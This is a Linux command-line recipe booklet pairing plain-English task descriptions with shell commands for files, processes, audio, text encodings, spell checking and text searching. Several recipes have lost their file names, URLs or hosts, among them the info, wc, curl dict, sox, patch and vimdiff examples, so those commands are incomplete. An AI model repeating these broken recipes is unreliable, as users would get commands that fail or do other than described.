The Linux Operating System

Table of Contents

last revision
09 March 2012, 1:55pm
book quality


Quote: "I'm doing a (free) operating system, just a hobby,..." (Linus Torvalds)

This booklet is designed to help with common tasks on a Linux system. It is presented as a series of "recipes" for accomplishing those tasks: each recipe consists of a plain-English one-line description, followed by the Linux command which carries out the task. The document is focused on performing tasks in Linux using the 'command line' or 'console'. The format of the booklet was largely inspired by the "Linux Cookbook".

a good list of resources
some command line recipes
a very good site with lots of command-line tips
A very good Linux User "cookbook" and the primary inspiration for the booklets on this site.

Good Books ‹↑›

www: The UNIX Environment (Andrew Walker, Wiley 1984)
www: The Linux Cookbook (Michael Stutz, No Starch Press)
www: The Unix Programming Environment (Kernighan et al)

Online Books ‹↑›

a philosophical book about the unix operating system by Eric Raymond (2003)
a list of online linux books

Getting Help ‹↑›

The traditional Unix help system is called 'man' or 'manual' pages. And they can be good. It is one of the ironies and frustrations of Unix that a man page only really becomes helpful and interesting once one already knows what a program does and how to basically use it.

show the short help description for all programs

 whatis -r '.*'
 for i in $(ls $(echo $PATH | tr ':' ' ')); do whatis $i; done | less

search for all programs which have something to do with 'java'

 whatis -r '.*' | grep java
 whatis -r 'java'
 whatis -r java

view the 'manual' page for the wc (word/line/character count) command

 man wc

Sadly, 'man' pages are often written in a cryptic way and are short on examples. The examples, if there are any, are almost always right at the end of the man page.

view the manual page for 'command' in 'section' 4 of the manual (see the list of sections elsewhere)

 man 4 command

show what software is available to install, relating to 'page layout'

 apt-cache search "page layout"
 apt-cache search "page layout" | grep -v '^lib'   (excludes code libraries)

Search all man pages for the word 'dig'

 man -k dig   searches only the short descriptions, the same as 'apropos dig'

find documentation for latex packages in pdf format

 find /usr/share/doc/ -name '*.pdf'    on a debian system, at least

An Introduction To The Linux Command Line ‹↑›

Unix Culture Shock ‹↑›

Those users who have no experience with a Unix-style operating system, but are familiar with the Microsoft Windows operating system will experience a kind of 'culture shock' when they begin to use Linux. This is true even if the user is familiar with using the 'command-line' on a Microsoft computer. This section attempts to point out some of the things which may seem baffling and illogical to the new Linux user.

www: You can't just download an 'exe' and click on it to run it. However, you can easily install new software with 'sudo apt-get install <program-name>'
www: File names don't have to have extensions (such as '.txt'), but can. To an experienced Microsoft command-line user, the idea of just calling a text file 'report' rather than 'report.txt' is rather disorientating. "How will the computer know what type of file it is?", the Microsoft user thinks. File names can and do begin with a dot '.', and can also begin with a tilde '~'
www: Linux commands are very short and cryptic. Why is the 'list files' command called 'ls' and not 'list'? It would be so much more memorable as 'list' than 'ls'. This is the "Unix way". If you like typing you can do: alias list='ls'
www: The folder hierarchy in Linux seems very cryptic, and you can't just put files anywhere

Basic User Commands ‹↑›

log in to the system with a username of 'bob'

 ubuntu login: bob

log out of the system

 logout

switch to the fourth virtual console

 press [ALT]-[F4]

switch from the fourth to the third virtual console

 press [ALT]-[F3]

switch from X to the first virtual console

 press [CTRL]-[ALT]-[F1]

run the hostname tool to find the name of the computer

 hostname

output the version of the hostname tool

 hostname --version

run hostname, specifying a file from which the hostname should be read

 hostname -F

change your password

 passwd

output your username

 whoami

see who is currently logged in

 who

see who is currently logged in and what they are doing

 w

display information about recent use of the system

 last | less

find out when the user 'mjb' last logged in

 last mjb

NOTE: The last tool gets its data from the system file '/var/log/wtmp'; the last line of output tells how far this file goes back.

Basic Process Commands ‹↑›

list the processes in your current shell session

 ps

list all the processes that user 'hst' has running on the system

 ps -u hst

This command is useful for listing all of your own processes

list all of the processes and give their user-names

 ps aux  there could be a lot of output, even on single user systems

display a continually updated display of the current system processes

 top

list all the processes containing a reference to an 'sbin' directory

 ps aux | grep sbin

list lines of 'ps' output which contain '13' (this matches more than just the process IDs)

 ps aux | grep 13

list the process whose PID is 344

 ps -p 344

Basic Software Commands ‹↑›

Run skype using your GTK theme

 skype --disable-cleanlooks -style GTK

output a list of programs that pertain to consoles

 apropos consoles

output a list of all tools whose pages in the system manual contain a reference to consoles

 man -k consoles

list all of the software packages installed on the system

 dpkg -l

list all of the packages whose name or description contains the text "edit," regardless of case

 dpkg -l | grep -i edit

peruse descriptions of the packages that are available

 less /var/lib/dpkg/available

get a description of the who tool

 whatis who

view the manual page for w

 man w

view all of the Info manuals on the system

 info

read the Info documentation for the tar tool

 info tar

This command opens a copy of The GNU tar Manual in info. To read the contents of a file written in Info format, give the name of the file with the '-f' option.

read '', an Info file in the current directory

 info -f

read '', an Info file in the current directory, beginning with the node Text

 info -n 'Text' -f

view the HTML version of the Debian FAQ in the lynx Web browser

 lynx /usr/share/doc/debian/FAQ/debian-faq.html

The above only works on a Debian flavour of Linux.

view the compressed text version of the Debian FAQ in zless,

 zless /usr/doc/debian/FAQ/debian-faq.txt.gz

Basic Command Line Usage ‹↑›

repeat the last command entered

 !!

Typing '!!' and pressing [enter] repeats the last command; pressing the [up-arrow] key instead brings the last command back to the input line without executing it.

retrieve the last command you entered with the string 'grep' in it

 <control-r>   press the <control> key and the 'r' key
(reverse-i-search)'': grep

put the 3rd-last command you entered with 'grep' in it on the input line

(reverse-i-search)'': grep   then press <control-r> twice more to step back to older matches

clear the screen and then log out of the system

 clear; logout

run the hostname command twice

 hostname; hostname

redirect the standard input of apropos so that it reads from the file 'keywords'

 apropos < keywords

redirect standard output of a command to the file 'commands'

 apropos shell bash > commands

append the standard output of apropos shells to the file 'commands'

 apropos shells >> commands

redirect the standard error of apropos shell bash to 'command.error'

 apropos shell bash 2> command.error

perform a long task in the background, saving all messages to 'img.txt'

 find / | xargs file | grep image &>~/img.txt &

In the command above, both the error messages and the normal output of the command are redirected ('&>') to the 'img.txt' text file in the user's home folder.
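
The '&>file' form is a bash convenience. A sketch of the equivalent long-hand redirection, using a deliberately failing command ('out.txt' is a hypothetical file name):

```shell
# send stdout to the file, then point stderr at the same place;
# note that '2>&1' must come after the '>' redirection
ls /nonexistent-path > out.txt 2>&1
# out.txt now holds the error message; nothing appeared on the terminal
```

If the order is reversed ('2>&1 > out.txt'), stderr is duplicated before stdout is redirected, so the error messages still appear on the terminal.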

append the error output of a command to an existing file 'command.error'

 apropos shells 2>> command.error

redirect the standard output and standard error to the file 'commands'

 apropos shells &> commands

view the output of "apropos bash shell shells" in a 'pager' program

 apropos bash shell shells | less

A pager program allows you to view output from a program one (screen) page at a time. (pagers: more/less/most)

run the command apropos shell > shell-commands as a background job

 apropos shell > shell-commands &

run job 4 in the background

 bg %4

Trivia: running a job in the background is sometimes called "backgrounding" or "amping off" a job.

bring the most recent background job to the foreground

 fg

bring job 3 to the foreground

 fg %3

list your jobs

 jobs

kill job number 2

 kill %2

to interrupt a running command use [control] c

 find / -name '*e*'
 [control] c

search your command history for the text 'apropos'

 history | grep apropos

specify the second-to-the-last command in your history

 !-2

Trivia: '!', the exclamation mark is sometimes called "bang"

run history event number 1 (the first command in your history list)

 !1

create a script of a shell session and save it to the file 'log.1'

 script log.1

Simple File Commands ‹↑›

create the file 'new.txt' in the current directory

 touch new.txt

create the file 'new' in the 'work/docs' subdirectory of the current directory

 touch work/docs/new

On a Unix-style computer, such as Apple OSX or Linux, files do not have to have 'extensions' to their names, unlike on Microsoft Windows.
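
The 'file' tool illustrates this: it guesses a file's type by inspecting its contents, not its name (a sketch; the exact output wording varies between versions):

```shell
echo "some notes" > report    # a text file with no extension at all
file report                   # prints something like: report: ASCII text
```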

make a new directory called 'work' in the current working directory

 mkdir work

create the 'work/completed/2001' directory

 mkdir -p work/completed/2001
 mkdir --parents work/completed/2001    the same

If the 'work' and 'completed' folders do not exist, then they will be created.

Simple Folder Commands ‹↑›

change the current working directory to '/usr/share/doc'

 cd /usr/share/doc

return to the directory you were last in

 cd -

determine what the current working directory is

 pwd

list the contents of 'work', a subdirectory in the current directory

 ls work

list the contents of the '/usr/doc' directory

 ls /usr/doc

list the contents of the directory so that directories and executables are distinguished from other files

 ls -F

output a verbose listing of the '/usr/doc/bash' directory

 ls -l /usr/doc/bash

output a recursive listing of the current folder and sub-folders

 ls -R

list all of the files on the system

 ls -R /

list the files in the 'log' directory sorted with newest first

 ls -t /var/log

The '/var/log' folder usually contains 'log' files which record the activities of software running on the computer. Type 'man hier' for more information about the Linux folder structure.

list all files in the current directory (including 'hidden' files)

 ls -a

output a tree graph of your home directory and all its subdirectories

 tree ~       this shows files as well as folders

show just the start of the folder tree for '/usr/local'

 tree -d /usr/local | head -20


peruse a tree graph of the '/usr/local' directory tree

 tree -d /usr/local | less

Copying Files ‹↑›

copy the file 'old' to the file `new'

 cp old new

copy files preserving the file attributes

 cp -p file.txt new-copy.txt

copy the folder 'reports' verbosely (showing what is being done)

 cp -vr reports ~/new/

copy a folder tree verbosely, but only copy files which are newer

 cp -vur docs/office ~/docs

copy the folder 'public_html', and subfolders, to 'private_html'

 cp -R public_html private_html

NOTE: the behaviour of 'cp -R' with symbolic links varies; the "man" page for GNU cp states that -r and -R are equivalent. To be sure that links are preserved as links, use 'cp -a' (below).
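
A small sketch (assuming GNU cp) showing that the archive option '-a' keeps a symbolic link as a link rather than copying the file it points to:

```shell
mkdir -p src
echo hello > src/real.txt
ln -s real.txt src/link.txt   # a relative symbolic link
cp -a src dst                 # archive copy: the link stays a link
ls -l dst/link.txt            # shown as: link.txt -> real.txt
```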

make an archive copy of the directory tree 'public' to 'private'

 cp -a public_html private_html

Moving Files ‹↑›

move the file 'notes' in the current working directory to '../play'

 mv notes ../play

move the file '/usr/tmp/notes' to the current working directory,

 mv /usr/tmp/notes .

This command moves the file '/usr/tmp/notes' to the current working directory.

move the directory 'work' in the current working directory to 'play'

 mv work play

rename the file 'notes' to `notes.old'

 mv notes notes.old

NOTE: to rename multiple files use 'rename'

Deleting Files ‹↑›

remove the file 'notes' in the current working directory

 rm notes

remove the directory 'waste' and all of its contents

 rm -R waste

remove the directory 'empty'

 rmdir empty

use tab completion to remove the file 'No Way' in the current directory

 rm No[TAB] Way

delete the file '^Acat' in a directory that also contains the files 'cat' and `dog'

 rm -i ?cat   rm: remove '^Acat'? y 

remove the file '-cat' from the current directory

 rm -- -cat

Symbolic Links ‹↑›

create a hard link from 'seattle' to `emerald-city'

 ln seattle emerald-city

create a symbolic link from 'seattle' to `emerald-city'

 ln -s seattle emerald-city

list all files in the '/usr/bin' directory that have the text 'tex' anywhere in their name

 ls /usr/bin/*tex*

copy all files whose names end with '.txt' to the `doc' subdirectory

 cp *.txt doc

output a verbose listing of all files whose names end with either a '.txt' or '.text' extension, sorting the list so that newer files are listed first

 ls -lt *.txt *.text

remove all files in the current working directory that begin with a hyphen and have the text 'out' somewhere else in their file name

 rm -- -*out*

join text files whose names have an 'a' followed by 2 or more characters

 cat a??*

The original files are unchanged, but the joined together text files are displayed on the screen.
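
To keep the joined text instead of just displaying it, redirect the output to a new file; a sketch with hypothetical file names:

```shell
printf 'part one\n' > abc.txt
printf 'part two\n' > axy.txt
cat a??* > joined.txt    # the matching files are joined in sorted name order
```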

The Bash Prompt ‹↑›

change your shell prompt to 'Your wish is my command: '

 PS1='Your wish is my command: '

change your prompt to the default bash prompt (the current folder)

 PS1='\w $ '

change the prompt to the current date, space, the hostname, and a '>'

 PS1='\d (\h)>'

clear the screen every time you log out,

  clear     put this in the file '.bash_logout'

Installing Software ‹↑›

search for games software which are available to install

 apt-cache search game

update the repository cache

 sudo apt-get update

Add new repositories to the file '/etc/apt/sources.list'

Sound ‹↑›

A Linux system is capable of playing, recording and editing sound (audio) files with a variety of open-source software. This section provides only a succinct overview of the most important sound tasks with Linux. For more detailed information, please consult the booklet listed below.

A more comprehensive introduction to using audio with the Linux operating system.

synthesize text as speech

 echo "hello world " | festival --tts

find the duration of the audio file 's.wav' in hours/minutes/seconds

 soxi -d s.wav
 soxi s.wav | grep -i duration   the same

Recording Audio ‹↑›

record a 'wav' file from the microphone, saving it to 'hello.wav'

 rec hello.wav

This begins an 8,000 Hz, monaural 8-bit WAV recording, which is not very good quality.

make a high-fidelity recording from the mic and save it to 'goodbye.wav'

 rec -s w -c 2 -r 44100 goodbye.wav

Playing Audio ‹↑›

play the MP3 stream at the url


Converting Audio File Formats ‹↑›

It is a common task to need to convert sound files from one format to another.

translate an audio file in Sun AU format to a Microsoft WAV file,

 sox recital.wav

convert 'sound.mp3' into a wav file 'new.wav' (a new file is created)

 mpg321 -w new.wav old.mp3   the file 'old.mp3' is unchanged
 mpg123 -w new.wav old.mp3   the same

encode an MP3 file from a WAV file called 'september-wind.wav'

 lame september-wind.wav september-wind.mp3

Editing Sound ‹↑›


join the audio files 'a.wav' and 'b.wav' together and save as 'new.wav'

 sox a.wav b.wav new.wav

Translation ‹↑›

tools for editing sound
audacity - a good graphical sound editor
sox - a command line audio editor

Unicode ‹↑›

Find UTF-8 text files misinterpreted as ISO 8859-1 due to a Byte Order Mark (BOM)

 grep -rl $'\xEF\xBB\xBF' .

show the current locale (language and character encoding)

 locale

show a hexdump of a text file

 hd file.txt
 hexdump file.txt    #(the format is a little different)

Text File Encodings ‹↑›

Convert a file from ISO-8859-1 (or some other encoding) to UTF-8 with the 'tcs' tool

 tcs -f 8859-1 -t utf /some/file

Convert filenames from ISO-8859-1 to UTF-8

 convmv -r -f ISO-8859-1 -t UTF-8 --notest *

Detect encoding of the text file 'file.txt'

 file -i file.txt  -i is the 'mime' switch, but it also shows encoding

convert file from utf8 (no bom) to utf16 (with 'bom')

 recode UTF8..UTF-16LE linux-utf8-file.txt

convert all '.php' files to the utf-8 text encoding

 find . -name "*.php" -exec iconv -f ISO-8859-1 -t UTF-8 {} -o ../newf/{} \;

find utf-8 encoded text files misinterpreted as iso 8859-1 (they begin with a byte-order mark)

 find . -type f | while read f; do [ "$(head -c3 "$f")" = $'\xef\xbb\xbf' ] && echo "match: $f"; done

translation tools
youtranslate - uses web services such as google

Fix UTF-8 text files misinterpreted as ISO 8859-1 due to a Byte Order Mark (this strips the BOM)

 perl -i -pe 's/\xef\xbb\xbf//g' <file>

Convert file type to unix utf-8

 ex some_file "+set ff=unix fileencoding=utf-8" "+x"

Convert one file from ISO-8859-1 to UTF-8.

 iconv --from-code=ISO-8859-1 --to-code=UTF-8 iso.txt > utf.txt

Spell Checking ‹↑›


spell checking programs
spell - a non-interactive spell checker
ispell - a veteran interactive spell checker
aspell - the GNU version
myspell - the open-office spell checker
hunspell - based on ispell
spellutils - a debian package to selectively spell check

search for all debian packages which have something to do with spelling

 apt-cache search spell

spell check the file 'lecture'

 spell lecture

prints a list of badly spelled words

print all misspelled words in all ".txt" files with line numbers

 spell -n -o *.txt

spell check the file 'ch.1.txt', with misspellings to the file 'bad.sp'

 spell ch.1.txt > bad.sp

check the spelling of a word on the command line

 echo 'is this korrect ?' | spell

This prints 'korrect', since it is badly spelled

output a sorted list of the misspelled words from 'lecture.draft'

 spell lecture.draft | sort | uniq

Ispell ‹↑›

'ispell' is an older and simpler program than 'aspell'

interactively spell check 'report.txt'

 ispell report.txt

install a British English dictionary for the "ispell" spell checker

 sudo apt-get install ibritish

check and correct the spelling interactively in document "report.txt"

 ispell report.txt
when a misspelling is found, type the number of the replacement

spell check "file.txt" using a british english dictionary

 ispell -d british file.txt

spell check a document written in spanish (using a spanish dictionary)

 ispell -d spanish archivo.txt

show what dictionaries are available locally for ispell

 ls /usr/lib/ispell/

the ispell dictionaries are all called "i[language-name]"

 dictionary files: icatalan, ibrazilian ...

spell check and correct "thesis.tex" which is a LaTeX format document

 ispell -t thesis.tex  ispell ignores the latex mark-up codes

Aspell ‹↑›

aspell is a more modern and capable spell checking program

the official site
A usage manual for aspell
show options for aspell and available dictionaries

 aspell help | less

show locally available dictionaries for aspell

 aspell dicts

install a British and American English dictionary for aspell

 sudo apt-get install aspell-en

install a spanish dictionary for aspell

 sudo apt-get install aspell-es

show all debian packages and dictionaries for aspell

 apt-cache search aspell

interactively check the spelling of the file "chapter.txt"

 aspell -c chapter.txt
 aspell check chapter.txt      the same

Aspell With Other Languages ‹↑›

check the spelling of "chapter.txt" using British English spelling

 aspell -d british -c chapter.txt
 aspell -d en_GB -c chapter.txt   this is the same

check the spelling of "chapter.txt" using a Spanish dictionary

 aspell -d spanish -c chapter.txt
 aspell -d es -c chapter.txt   this is the same

check spelling in the comments in the shell script (lines starting with "#")

 aspell --mode=comment -c   !! doesn't work on my version

checking the spelling in the tex/latex file "chapter.tex"

 aspell -t -c chapter.tex

show available filters for spell-checking particular types of files

 aspell filters
 aspell dump filters   the same

spell check a file skipping (ignoring) lines which start with '>'

 aspell --mode=email check book.txt
 aspell --mode=email -c book.txt    the same
 aspell -e -c book.txt

create a vim "mapping" to use aspell within vim

 map TT :w!<CR>:!aspell check %<CR>:e! %<CR>

spell check a file but only between a "*" character and the end of the line

 aspell --add-filter=context --add-context-delimiters="* \0" -c francisco.txt
this doesn't really work

Text Files ‹↑›

Viewing Text Files ‹↑›

editors with spell checking
vim - type ':set spell' to activate, and 'z=' to correct

To print a specific line (line 5, say) from a file

 awk 'FNR==5' <file>

text file viewing tools
less - a text file pager
most - a more capable pager

set the default pager to be the 'most' program

 update-alternatives --set pager /usr/bin/most

View non-printing characters with cat

 cat -v -t -e

See non-printable characters, like tabs, and CRLF or LF line endings

 od -c <FILE> | grep --color '\\.'

Less ‹↑›

the homepage for less
The humble 'less' program is worthy of a second look. Less allows one to peruse and search a text file, but not alter it. I am documenting version 429 (year 2008). Less uses vi-like keys to move around and search.

view the text file 'doc.txt' one screen page at a time

 less doc.txt

view the text file 'days.txt' starting at the end

 less +G days.txt


some common 'less' commands
[space-bar] - forward one window
[esc] + [space-bar] - forward one window (with multiple files)
b - back one window
j - down one line (the same as 'vim')
k - up one line (the same as 'vim')
F - go to end of file and 'follow' new data (like tail -f)
G - go to the last line of the file
g - go to the first line of the file
/pattern - Search forward for (N-th) matching line.
?pattern - Search backward for (N-th) matching line.
n - Repeat previous search (for N-th occurrence).
N - Repeat previous search in reverse direction.
ESC-n - Repeat previous search spanning files.
v - edit the current file with $VISUAL or $EDITOR

Starting Less ‹↑›

view the file 'long.txt' and make searches within less case-insensitive

 less -I long.txt

view the file 'long.txt', with 'semi' case-insensitive searching

 less -i long.txt  searches with capital letters are case-sensitive

make an alias which will make less always semi case-insensitive

 alias less='less -i'

within less turn on or off case-insensitive searching

 -I [enter]

within less see whether searches are case-sensitive or not

 _I     the underscore displays the current value of an option

view the output of 'grep' starting at the first line which has 'science' in it

 grep tree forest.txt | less +/science

follow the end of the log file 'tcp.log' showing new data as it enters

 less +F tcp.log   this is like 'tail -f' but allows more perusal

Search for a word in less

 /word     then 'n' repeats the search

go to the 80% position in the file (that is, 80% towards the end)

 80%

display less commands

 h     shows the help summary of less commands

Less With Multiple Files ‹↑›

search multiple files for the text 'tree'

 less *.txt (then type) /*tree

Less Bookmarks ‹↑›

Less bookmarks work in the same way as 'vi' or 'vim' bookmarks

mark the current top-of-screen position in the text file as bookmark 'x'

 mx     any single letter can be used as a bookmark

jump to the bookmark x

 'x     a single quote followed by the bookmark letter

save text from current top-of-screen to the bookmark 'x' in file 'save.txt'

 |x cat > save.txt

jump to where you just were (before going to a bookmark)

 ''     two single quote characters

edit the current file (but the variable $EDITOR or $VISUAL must be set)

 v

Analysing Language ‹↑›

Dictionaries ‹↑›

Look up the definition of a word

 curl dict://

Wordnet ‹↑›

get help for wordnet

 man wnintro
 man wn

show a list of word senses available for the word 'browse',

 wn browse -over

output a list of words from the dictionary that begin with the string 'homew'

 look homew  prints something like 'homeward' and `homework' ...

list words in the dictionary containing the string 'dont' regardless of case

 grep -i dont /usr/dict/words

list all words in the dictionary that end with 'ing'

 grep 'ing$' /usr/dict/words

list all of the words that are composed only of vowels

 grep -i '^[aeiou]*$' /usr/dict/words

output a list of words that rhyme with 'friend', search '/usr/dict/words' for lines ending with `end':

 grep 'end$' /usr/dict/words

search the WordNet dictionary for nouns that begin with 'homew'

 wn homew -grepn

search the WordNet dictionary for nouns and adjectives that begin with 'homew'

 wn homew -grepn -grepa

list the definitions of the word 'slope'

 wn slope -over

output all of the synonyms (same meaning) for the noun 'break'

 wn break -synsn

output all of the synonyms for the verb 'break'

 wn break -synsv

output all of the antonyms (opposite meaning) for the adjective 'sad'

 wn sad -antsa

A hypernym of a word is a related term whose meaning is more general

output all of the hypernyms for the noun 'cat'

 wn cat -hypen

Debian 'dict'

check file 'dissertation' for clichés or other misused phrases, type:

 diction dissertation | less

check file 'dissertation' for clichés or other misused phrases, and write the output to a file called 'dissertation.diction'

 diction dissertation > dissertation.diction

If you don't specify a file name, diction reads text from the standard input.

output all lines containing double words in the file 'dissertation'

 diction dissertation | grep 'Double word'

check the readability of the file 'dissertation'

 style dissertation

Like diction, style reads text from the standard input if no file is given.

output all sentences in the file 'dissertation' whose ARI (Automated Readability Index) is greater than 20

 style -r 20 dissertation

output all sentences longer than 14 words in the file 'dissertation'

 style -l 14 dissertation

output the number of lines, words, and characters in file 'outline'

 wc outline

output the number of characters in file ''

 wc -c

Use wc with the '-w' option to specify that just the number of words be output.

output the number of words in the file 'story'

 wc -w story

output the combined number of words for all the files with a '.txt' file name extension in the current directory

 cat *.txt | wc -w

output the number of lines in the file 'outline'

 wc -l outline

output a word-frequency list of the text file 'naked_lunch',

 tr ' ' '\n' < naked_lunch | sort | uniq -c

output a count of the number of unique words in the text file 'naked_lunch'

 tr ' ' '\n' < naked_lunch | sort | uniq -c | wc -l
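
Building on the recipes above, a sketch that ranks the words by how often they occur, folding upper case to lower case so that 'The' and 'the' are counted together ('naked_lunch' is the example file from above):

```shell
# split on every non-letter character, lowercase, then count and rank
tr -cs '[:alpha:]' '\n' < naked_lunch \
    | tr '[:upper:]' '[:lower:]' \
    | sort | uniq -c | sort -rn | head
```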

rank the files report.a, report.b, report.c in order of relevance to the keywords 'saving' and `profit'

 rel "(saving & profit)" report.a report.b report.c

output a list of any files containing either 'invitation' or 'request' in the `~/mail' directory, ranked in order of relevancy, type:

 rel "(invitation | request)" ~/mail

output a list of any files containing 'invitation' and not 'wedding' in the `~/mail' directory, ranked in order of relevancy, type:

 rel "(invitation ! wedding)" ~/mail

output a list of any files containing 'invitation' and 'party' in the '~/mail' directory, ranked in order of relevancy

 rel "(invitation & party)" ~/mail

Wrapping Text Lines ‹↑›

format a text file with lines 80 characters long,

 fmt -w 80 textfile   short lines lengthened
 fmt -s -w 80 textfile   short lines are not lengthened

use par instead

Splitting Text Files ‹↑›

split a file into a maximum of 10 files on lines containing '#200', '#400', '#600' etc with output files called "zz00", "zz01", etc

 csplit -f zz file.txt "/^#1?[24680]00$/" {8}
the split occurs 'before' the line containing the match
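
A small sketch of the same idea on a hypothetical five-line file, showing that each matched line starts the next output piece:

```shell
printf 'a\n#200\nb\n#400\nc\n' > file.txt
csplit -f zz file.txt '/^#[24]00$/' '{1}'   # prints the size of each piece
cat zz00    # contains: a          (everything before the first match)
cat zz01    # contains: #200, b    (the matched line begins the piece)
```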

Merging Text Files ‹↑›

join the lines of two files which share a common first field

 join file1.txt file2.txt > file3.txt

merge the given files line by line, separating the columns with ',' and ':' in turn

 paste -d ',:' file1 file2 file3

Converting Other Formats To Text ‹↑›

convert from html to text

 lynx -dump http://url > textfile
 links -dump http://url > textfile   may render tables
 w3m -dump http://url > textfile     may render tables better

remove the carriage-return characters (DOS line endings) from the text file 'autoexec.bat'

 fromdos autoexec.bat
 dos2unix autoexec.bat the same

add carriage-return characters (DOS line endings) to all of the '.tex' files in the current directory

 todos *.tex
 unix2dos *.tex the same

Converting Character Encodings ‹↑›

Convert encoding of given files from one encoding to another
 iconv -f utf8 -t utf16 /path/to/file

see also the 'recode' tool (below)

show possible conversions with the 'recode' tool

 recode -l | less

convert latin9 (western europe) character encoding to utf8

 recode iso-8859-15..utf8 report.txt    the actual file is changed

convert from the local character set to the latin1 encoding saving to "new.txt"

 recode ..lat1 < file.txt > new.txt   the original file is unchanged

convert to html

 recode ..HTML < file.txt > file.html

convert from utf8 to html with verbose output

 recode -v u8..h < file.txt

convert from MS Windows utf8 to the local character set

 recode utf-8/CRLF.. file-to-change.txt

Comparing And Patching Text Files ‹↑›

The process of 'patching' a text or code file is very important in the world of open-source development (and therefore in the development of Linux itself). Patching allows non-linear changes to be made to a file and is usually used in conjunction with 'diff'
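
A minimal sketch of that workflow, using hypothetical file names: 'diff -u' records the changes between two versions as a unified-format patch, and 'patch' replays those changes onto the original:

```shell
printf 'one\ntwo\n'   > original.txt
printf 'one\nthree\n' > changed.txt
diff -u original.txt changed.txt > changes.diff   # record the differences
patch original.txt < changes.diff                 # apply them to the original
# original.txt is now identical to changed.txt
```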

Use colordiff in side-by-side mode, and with automatic column

 colordiff -yW"`tput cols`" /path/to/file1 /path/to/file2

Compare a file with the output of a command, or compare the output of two commands

 vimdiff foo.c <(bzr cat -r revno:-2 foo.c)

remote diff with side-by-side ordering.

 ssh $HOST -l$USER cat /REMOTE/FILE | sdiff /LOCAL/FILE -

Diff files on two remote hosts.

 diff <(ssh alice cat /etc/apt/sources.list) <(ssh bob cat /etc/apt/sources.list)

show lines that appear in both file1 and file2

 comm -1 -2 <(sort file1) <(sort file2)

find the extra lines in file2

 diff file1 file2 | grep ^>

find the extra lines in file1

 diff file1 file2 | grep ^<

Compare a remote file with a local file

 ssh user@host cat /path/to/remotefile | diff /path/to/localfile -

Generate diff of first 500 lines of two files

 diff <(head -500 product-feed.xml) <(head -500 product-feed.xml.old)

compare the files 'manuscript.old' and `'

 diff manuscript.old

peruse the files 'olive' and 'green' side by side indicating differences

 sdiff olive green | less

output a difference report for files 'tree', 'bush', and 'hedge',

 diff3 tree bush hedge > arbol

update the original file '' with the patchfile 'manuscript.diff'

 patch manuscript.diff

Colored diff ( via vim ) on 2 remotes files on your local

 vimdiff scp:// scp://

vimdiff to remotehost

 vimdiff <(ssh -A testserver "cat")

Searching Text ‹↑›

gnu grep special characters

  \< - matches the beginning of a word
  \> - matches the end of a word
  \b - matches a word boundary
  [:upper:] - matches upper case letters (unicode)
  [:lower:] - matches lower case letters (unicode)
  [:space:] - matches space characters

NOTE: the "--" sequence may be "escaped" in grep, for example: grep "\-\-" file.txt
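
A sketch of the word-boundary anchors (assuming GNU grep), with a hypothetical word list:

```shell
printf 'mall\nsmall\nmalls\n' > words.txt
grep '\<mall\>' words.txt    # matches only the whole word: mall
grep 'mall' words.txt        # matches all three lines
```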

search interactively and ignoring case all '.txt' files in this folder

 cat *.txt | less -I   then type '/' to search
 less -I *.txt         then type '/*' to search, seems better

search for lines which begin with "#" in the text file "script"

 grep '^#' <script

display lines which begin with an uppercase letter or word in 'doc.txt'

 grep '^[[:upper:]]\+' doc.txt

display lines in 'doc.txt' which do not have any upper case letters in them

 grep '^[^[:upper:]]*$' doc.txt

search for lines which don't contain the word "the"

 grep -v the <file

show all lines which contain neither the word "tree" nor "green"

 egrep -v "tree|green" tree.txt

show the names of all files containing the word 'tree' (searches subfolders)

 find . | xargs grep -l "tree" the fastest way
 find | xargs grep -l "tree"   the dot doesnt seem important
 grep -l tree $(find .)        the same but not for lots of files
 grep -rl tree *               veeery sloow

show names of all files Not containing the word 'mall' (searches subfolders)

 find | xargs grep -L "mall"      matches mall, small, ...
 find | xargs grep -L "\<mall\>"  only matches 'mall'

show the number of lines in a file which start with the word "tree"

 grep "^ *tree" book.txt | wc -l
 grep -c "^ *tree" book.txt     the same

search for "leaf" or "tree" ignoring the case of the words

 grep -i -e "leaf" -e "tree" *
 egrep -i "leaf|tree" *        the same
shows lines with the word "Leaf", "TREE", "trEE" etc

show all text files in the books folder which have more than 100 lines

 find books/ | xargs wc -l | sort -rn | awk '$1 > 100 {print $2}'

search for a pattern (regex) in all text files (ignoring binary files)

 find . -type f | perl -lne 'print if -T;' | xargs egrep "somepattern"

Find And Replace In Text Files ‹↑›

note: 'turma' is a graphical tool for search and replace

Single File ‹↑›

replace uppercase letters with lower case letters

 tr '[:upper:]' '[:lower:]' <file  handles international text
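A quick way to see the effect, piping some sample text (invented here) through tr:

```shell
# lower-case a line of text; tr reads standard input
echo 'Hello World' | tr '[:upper:]' '[:lower:]'   # prints: hello world
```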

'squeeze' multiple spaces in the file "test.txt"

 tr -s ' ' < test.txt           tr reads standard input, not file arguments
 tr -s '[:blank:]' < test.txt   the same but better, handles tabs as well

change aaa for bbb and print each line

 perl -p -e 's/aaa/bbb/' test.txt     the file is not changed

replace "aaa" with "bbb" and print each line

 perl -pi -e 's/aaa/bbb/' test.txt    the file IS changed

With A Backup ‹↑›

replace the word "big" with "small" in .txt files backing up to .bak

 perl -p -i.bak -e 's/\bbig\b/small/g' *.txt

Multiple Files ‹↑›

Change string in many files at once and more.

 find . -type f -exec grep -l XXX {} \;|tee /tmp/fileschanged|xargs perl -pi.bak -e 's/XXX/YYY/g'

replace the word "big" with "small" in .txt files backing up to .bak

 perl -p -i.bak -e 's/\bbig\b/small/g' *.txt

recursive replacement of text in the current folder and subdirectories

 perl -p -i.bak -e 's/\bbig\b/small/g' $(grep -ril big *)

change 'big' to 'BIG' in all '.txt' files in this folder and subfolders

 sed -i.bak 's/big/BIG/g' $(find . -name '*.txt')
the files are edited 'in place' and backed up to '.txt.bak'

find .txt files inside a directory and replace every occurrence

 find . -name '*.txt' -exec sed -i 's/this/that/g' {} \;

a find and replace within text-based files, to locate and rewrite

 find . -name "*.txt" | xargs perl -pi -e 's/old/new/g'

find and replace with vim 'argdo'

 vim *.txt    then within vim type  :argdo %s/old/new/ge | update

Analysing Text ‹↑›

get line number of all matches in a file

 awk '/match/{print NR}' file

count how many lines of each length occur in a file

 awk '{cc[length]++}END{for(i in cc){printf("%d: %d\n", cc[i], i)}}' file
each output line shows 'count: line-length'

show unique words and the number of times each word occurs

 tr -sc 'A-Za-z' '\n' < file.txt | sort | uniq -c | less

Count the number of lines in all '.php' files in this and subfolders

 wc -l $(find . -name '*.php')

plot the frequency distribution of words from files

